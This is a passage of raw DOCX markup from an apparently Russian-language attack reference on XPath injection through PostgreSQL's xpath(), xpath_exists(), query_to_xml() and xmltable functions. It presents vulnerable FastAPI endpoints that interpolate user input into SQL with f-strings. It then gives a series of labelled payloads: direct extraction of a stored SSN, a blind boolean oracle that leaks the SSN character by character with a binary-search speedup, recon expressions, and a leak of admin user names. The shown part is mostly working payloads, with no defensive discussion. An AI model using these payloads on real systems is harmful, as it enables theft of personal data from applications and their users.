          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;private&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;ssn&gt;123-45-6789&lt;/ssn&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;salary&gt;120000&lt;/salary&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;/private&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/user&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Application ожидает: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">xpath_expr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> начинается с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/user/public/...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — публичные поля.</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xpath_expr</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/user/private/ssn/text()</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xpath('/user/private/ssn/text()', xml_content) FROM documents WHERE id = 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Результат: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">{123-45-6789}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (XML-array из одного text-элемента). Application возвращает в HTTP-response — SSN утёк.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Альтернативы для recon неизвестной структуры XML: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все элементы (рекурсивный спуск).</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 имена всех элементов.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//*[name()='private']</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — все элементы с тегом </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">private</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на любой глубине.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count(//*)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — количество элементов (для гипотез о размере).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload B — XPath blind через xpath_exists() как boolean-oracle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Контекст: эндпоинт не возвращает результат xpath() напрямую, но валидирует существование через xpath_exists():</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">@router.get("/documents/{doc_id}/validate")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def validate(doc_id: int, xpath_expr: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 = text(f"SELECT xpath_exists('{xpath_expr}', xml_content) FROM documents WHERE id = :id")</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 {"id": doc_id})</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return {"valid": result.scalar()}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Атакующий получает boolean-oracle через подбор XPath-предикатов.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload для извлечения первого символа SSN (бинарный поиск):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">//ssn[starts-with(text(), '1')]</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xpath_exists('//ssn[starts-with(text(), ''1'')]', xml_content) FROM documents WHERE id = 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">(SQLAlchemy escapes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to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f-string в text() — это часть атаки, апостроф нужно экранировать вручную в payload).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Если SSN начинается с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true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Иначе — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. HTTP-response </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">{"valid": true/false}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Атакующий перебирает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'0'</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'9'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (для цифр) или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'a'</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'z'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (для текста), получая первый символ. Далее </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">starts-with(text(), '12')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, и т.д. — посимвольный leak.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ускорение через бинарный поиск с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//ssn[substring(text(), 1, 1) &gt;= '5']</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">— проверка «первый символ ≥ '5'». ASCII-comparison. log2(10) ≈ 3.3 query на цифру вместо 5 при линейном поиске.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload C — XPath с computed path через query_to_xml() для leak метаданных</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Когда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-колонок в схеме нет, но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доступен (PUBLIC) — можно создать XML на лету и сразу XPath-выполнить:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Контекст: эндпоинт, который ищет в metadata через XPath:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">@router.get("/users/search")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search(name_xpath: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 = text(f"SELECT xpath('{name_xpath}', query_to_xml('SELECT id, name FROM users', true, false, ''))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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return result.scalar()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Атакующий контролирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">name_xpath</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Внутри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ждёт фиксированный SELECT. Но если атакующий может </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">через UNION или другой injection-канал</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> заменить аргумент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 он получает прямой leak любой таблицы.</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name_xpath</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (для extraction password_hash через side-channel — но xpath не может выполнить SQL, поэтому здесь только leak уже-сериализованного XML):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">//row[contains(name, 'admin')]/name/text()</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xpath('//row[contains(name, ''admin'')]/name/text()',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">             query_to_xml('SELECT id, name FROM users', true, false, ''))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">XPath фильтрует rows where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contains 'admin' — leak admin-имён через XPath.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Замена SELECT внутри query_to_xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> требует другой injection-точки (например, через 3.1 UNION + 3.8.5 mass dump combo). Сама 3.11.3 — про XPath-инъекцию над XML, не про SQL-injection в query_to_xml-аргумент. Граница: 3.11.3 атакует XPath; 3.8.5 атакует SQL-аргумент.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload D — xmltable с computed-path</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">xmltable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — наиболее мощная XML-функция PG, позволяет извлекать множество значений за один проход:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">q = text(f"""</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    SELECT name, age FROM xmltable(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        '{root_xpath}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        PASSING xml_content</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        COLUMNS</w:t>
      </w:r>
    </w:p>
